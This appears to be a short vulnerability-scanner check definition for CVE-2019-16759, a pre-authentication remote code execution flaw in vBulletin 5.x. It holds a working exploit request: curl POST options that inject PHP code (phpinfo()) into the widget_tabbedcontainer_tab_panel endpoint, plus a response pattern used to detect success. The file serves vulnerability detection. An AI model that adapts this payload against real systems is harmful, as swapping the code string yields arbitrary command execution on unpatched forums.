AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-16759 - vBulletin 5.x 0-Day Pre-Auth Remote Command Execution Bypass'
URI='/ajax/render/widget_tabbedcontainer_tab_panel'
METHOD='POST'
MATCH='PHP\ Version'
SEVERITY='P1 - CRITICAL'
CURL_OPTS='-d "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();" -H "Content-Type: application/x-www-form-urlencoded" --user-agent "" -s -L --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'